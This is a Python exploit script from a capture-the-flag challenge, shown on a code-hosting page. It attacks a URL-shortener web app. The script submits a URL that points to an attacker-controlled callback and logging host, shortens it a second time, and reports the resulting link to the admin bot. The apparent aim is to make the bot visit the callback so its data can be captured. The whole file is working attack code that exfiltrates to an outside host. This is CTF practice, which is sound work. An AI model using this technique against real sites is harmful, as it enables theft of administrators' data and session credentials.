Files
ctf/catthegray25/ezpz/dist-oops/exploit.py
2025-06-01 01:29:56 +02:00

42 lines
1.2 KiB
Python

import requests
from bs4 import BeautifulSoup
LOCAL = True
if LOCAL:
TARGET = "http://localhost:33001/"
else:
TARGET = "http://challs2.nusgreyhats.org:33001/" # Change this to actual challenge
CALLBACK = "http://oops.cato447.de/log"
payload_url = f"{CALLBACK}/payload"
print("[*] Submitting payload...")
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
assert res.ok
soup = BeautifulSoup(res.text, "html.parser")
short_input = soup.find("input", {"id": "shortenedUrl"})
assert short_input, "Shortened URL input not found"
short_url = short_input["value"]
print(f"[+] Short URL: {short_url}")
print("[*] Submitting short url...")
res = requests.post(f"{TARGET}/", data={"original_url": short_url})
assert res.ok
soup = BeautifulSoup(res.text, "html.parser")
short_pointer_input = soup.find("input", {"id": "shortenedUrl"})
assert short_pointer_input, "Shortened pointer URL input not found"
short_pointer_url = short_pointer_input["value"]
print(f"[+] Short pointer URL: {short_pointer_url}")
print("[*] Reporting...")
report = requests.post(f"{TARGET}/report", data={"submit_id": short_pointer_url})
if report.ok:
print("[+] Reported to admin — wait for callback!")
else:
print("[-] Reporting failed.")